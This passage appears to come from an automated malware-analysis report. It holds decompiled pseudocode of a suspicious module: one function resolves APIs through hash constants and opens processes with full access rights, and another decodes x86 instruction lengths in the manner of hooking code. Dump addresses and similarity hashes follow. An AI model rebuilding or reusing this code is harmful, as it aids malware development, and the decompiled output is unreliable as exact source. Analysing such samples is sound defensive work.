				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6E83B658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6E83F4D0(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6E83F654(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6E842234(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6E83F654(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6E83F584(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6E83F584(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6E83F4BC(_t449 + 0x14, 0);
									_t180 = E6E842908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6E83B5C4(_t449 + 0x34);
										E6E83B5C4(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6E83F4BC( *(_t449 + 4), _t315 << 2)));
										_t188 = E6E83F4BC( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6E83B5C4(_t449 + 0x34);
										E6E83B5C4(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6E83CA8C(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6E83C280(_t343);
									if(__eflags != 0) {
										break;
									}
									E6E83F828(_t449 + 0x14, E6E83F4CC(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6E83F4BC(_t449 + 0x14, E6E83F4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6E843064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6E83F828(_t449 + 0x40, E6E83F4CC(_t449 + 0x3c) + 4);
											 *(E6E83F4BC(_t449 + 0x40, E6E83F4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6E83CD24(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6E83F4BC( *(_t449 + 4), _t431 * 4);
												_t212 = E6E83F4BC(_t449 + 0x40, _t431 * 4);
												E6E838B58( *_t211, E6E8402B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6E83CD24(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6E83F4BC(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6E83F4CC( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6E83F4CC( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6E83F4BC( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6E83F4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6E8438F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6E83F4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6E83F828( *(_t449 + 4), E6E83F4CC( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6E83F4CC(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6E83F4CC(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6E83F4BC(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6E83F4BC(_t322, _t430);
										E6E8438F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6E83F4CC(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6E83F828(_t322, E6E83F4CC(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6E83F828( *(_t449 + 4), E6E83F4CC( *_t449) + 4);
								 *(E6E83F4BC( *(_t449 + 4), E6E83F4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6E83F828(_t322, E6E83F4CC(_t322) + 4);
								 *(E6E83F4BC(_t322, E6E83F4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6E83F4BC(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6E843064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6E83F4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6E83F828( *(_t449 + 4), E6E83F4CC( *_t449) + 4);
										 *(E6E83F4BC( *(_t449 + 4), E6E83F4CC( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6E83F4BC(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6E83F828( *((intOrPtr*)(_t449 + 0x74)), E6E83F4CC( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6E83F4BC( *((intOrPtr*)(_t449 + 0x74)), E6E83F4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6E83F4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6E83F4BC( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6E83F4CC( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6E83F4CC(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6E83F4BC(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6E83F4BC(_t430, _t443);
										E6E8438F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6E83F4CC(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6E83F828(_t430, E6E83F4CC(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6E843064(0x60a28c5c, 0xe96b154c);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6E83F4BC( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6E83F4CC( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6E83F4CC( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6E83F4BC( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6E83F4BC( *(_t449 + 4), _t445);
										E6E8438F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6E83F4CC( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6E83F828( *(_t449 + 4), E6E83F4CC( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6E83F4BC(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6e838435
0x6e83843b
0x6e83843f
0x6e838443
0x6e83844e
0x6e838452
0x6e838457
0x6e83845f
0x6e83846f
0x00000000
0x6e838471
0x6e838479
0x6e838480
0x6e838480
0x6e8389d3
0x6e8389d5
0x6e838a16
0x6e838a18
0x6e838a27
0x6e838a33
0x6e838a33
0x6e838a22
0x6e838a39
0x6e838a3e
0x00000000
0x6e838a3e
0x6e838a26
0x00000000
0x6e83848a
0x6e83848e
0x6e838491
0x6e838599
0x6e838599
0x6e83859e
0x6e8386c1
0x6e8386c5
0x6e8386ca
0x6e8386ce
0x6e8386d2
0x6e838808
0x6e83880a
0x6e83880e
0x6e838817
0x6e838822
0x6e838826
0x6e83882f
0x6e838834
0x6e83883a
0x6e83883b
0x6e83883f
0x6e838843
0x6e83884a
0x6e83884c
0x6e83898c
0x6e83899d
0x6e8389a4
0x6e8389ab
0x6e8389ab
0x6e8389ae
0x6e8389b1
0x6e8389b4
0x6e8389ba
0x6e8389c1
0x6e8389c5
0x6e8389ce
0x00000000
0x6e8389ce
0x6e8389bc
0x6e8389bf
0x6e8389d8
0x6e8389f0
0x6e8389f3
0x6e8389f8
0x6e838a02
0x6e838a05
0x6e838a08
0x6e838a11
0x00000000
0x6e838a11
0x00000000
0x6e8389bf
0x6e838854
0x6e838854
0x6e838856
0x6e83885a
0x6e83885f
0x6e838861
0x6e838865
0x6e838868
0x6e838870
0x6e838872
0x00000000
0x00000000
0x6e838889
0x6e8388a4
0x6e8388a6
0x6e8388b4
0x6e8388b9
0x6e8388bb
0x6e8388d8
0x6e8388d8
0x6e8388dc
0x6e8388de
0x00000000
0x00000000
0x6e8388e0
0x6e8388e3
0x6e838904
0x6e838923
0x6e838929
0x6e83892c
0x6e838931
0x6e838932
0x6e838939
0x00000000
0x00000000
0x6e838941
0x6e838941
0x6e838943
0x6e83894f
0x6e83895b
0x6e83897d
0x6e838982
0x6e838983
0x6e838983
0x00000000
0x6e838943
0x00000000
0x6e8388e3
0x6e8388bd
0x6e8388c3
0x6e8388c5
0x6e8388c6
0x6e8388c7
0x6e8388c8
0x6e8388cc
0x6e8388d0
0x6e8388d2
0x6e8388d3
0x6e8388d4
0x6e8388d6
0x00000000
0x00000000
0x00000000
0x6e8388d6
0x6e8388e9
0x00000000
0x6e8388e9
0x6e8386d8
0x6e8386da
0x6e8386dc
0x00000000
0x00000000
0x6e8386e6
0x6e8386e6
0x6e8386e8
0x6e8386eb
0x6e8386ed
0x6e8386f5
0x6e8386fc
0x6e838700
0x6e838703
0x00000000
0x00000000
0x6e8387ff
0x6e838800
0x6e838802
0x00000000
0x00000000
0x00000000
0x6e838802
0x6e838709
0x6e83870c
0x6e838715
0x6e83871a
0x6e83871c
0x6e838728
0x6e83872c
0x6e838731
0x6e838735
0x6e838b12
0x6e838b26
0x6e838b48
0x6e838b4d
0x6e838b4d
0x6e83874b
0x6e838750
0x6e838754
0x6e838754
0x6e838754
0x6e838754
0x6e838759
0x6e83875e
0x6e838760
0x6e838764
0x6e83876b
0x6e838770
0x6e838772
0x6e838ad3
0x6e838ae2
0x6e838afb
0x6e838b00
0x6e838b00
0x6e838785
0x6e83878a
0x6e83878e
0x6e83878e
0x6e83878e
0x6e8387a0
0x6e8387c1
0x6e8387c9
0x6e8387d7
0x6e8387f5
0x6e8387fb
0x6e8387fb
0x00000000
0x6e83870c
0x6e8385a4
0x6e8385a4
0x6e8385a6
0x6e8385ad
0x6e8385bb
0x6e8385bd
0x6e8385c1
0x6e8385c3
0x6e8385c5
0x6e838600
0x6e83860f
0x6e838611
0x6e838613
0x6e838631
0x6e838633
0x6e838635
0x6e838647
0x6e838665
0x6e83866e
0x6e838671
0x6e83867f
0x6e838690
0x6e8386ae
0x6e8386b0
0x6e8386b4
0x6e8386b4
0x6e8386b4
0x6e838635
0x00000000
0x6e838613
0x6e8385cb
0x6e8385cb
0x6e8385d0
0x6e8385d7
0x6e8385e6
0x6e8385ed
0x6e8385ef
0x00000000
0x00000000
0x6e8385fb
0x6e8385fc
0x6e8385fe
0x00000000
0x00000000
0x00000000
0x6e8385fe
0x6e8385f1
0x6e8385f4
0x00000000
0x00000000
0x6e8386b6
0x6e8386b6
0x6e8386b7
0x6e8386b7
0x00000000
0x6e838497
0x6e838497
0x6e838497
0x6e838499
0x6e8384a0
0x6e8384ae
0x6e8384b0
0x6e8384b4
0x6e8384b6
0x6e8384e2
0x6e8384e6
0x6e8384eb
0x6e8384f0
0x6e8384f4
0x6e8384f8
0x6e8384ff
0x6e838504
0x6e838506
0x6e838a95
0x6e838aa4
0x6e838ac3
0x6e838ac8
0x6e838ac8
0x6e838519
0x6e83851e
0x6e838522
0x6e838522
0x6e838522
0x6e838533
0x6e838535
0x6e838537
0x6e838548
0x6e838548
0x6e83854d
0x6e838552
0x6e838556
0x6e83855b
0x6e838562
0x6e838567
0x6e838569
0x6e838a57
0x6e838a63
0x6e838a7d
0x6e838a82
0x6e838a82
0x6e83857f
0x6e838584
0x6e838588
0x6e838588
0x6e838588
0x6e838588
0x6e83858b
0x6e83858b
0x00000000
0x6e83858b
0x6e8384ba
0x6e8384ba
0x6e8384bc
0x6e8384c8
0x6e8384cf
0x6e8384d1
0x00000000
0x00000000
0x6e8384dd
0x6e8384de
0x6e8384e0
0x00000000
0x00000000
0x00000000
0x6e8384e0
0x6e8384d3
0x6e8384d6
0x00000000
0x00000000
0x6e83858c
0x6e838590
0x6e838591
0x6e838591
0x00000000
0x6e838499
0x6e838491

Strings

, xrefs: 6E838A1A

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 6ef57238032d434573a229406e5b3f471aaa2c466f36d27769f972841248c63e
Instruction ID: 6af08bf8b397fc81742d4818b0b38418be8c46aa9a927520bca69a4ae2bcb1d4
Opcode Fuzzy Hash: 6ef57238032d434573a229406e5b3f471aaa2c466f36d27769f972841248c63e
Instruction Fuzzy Hash: DD123E712082259FC714DFE8C990AAEB7A9EF94704F308D2DE599D72A1DB309D05CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6E849370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6E849370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6E843698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
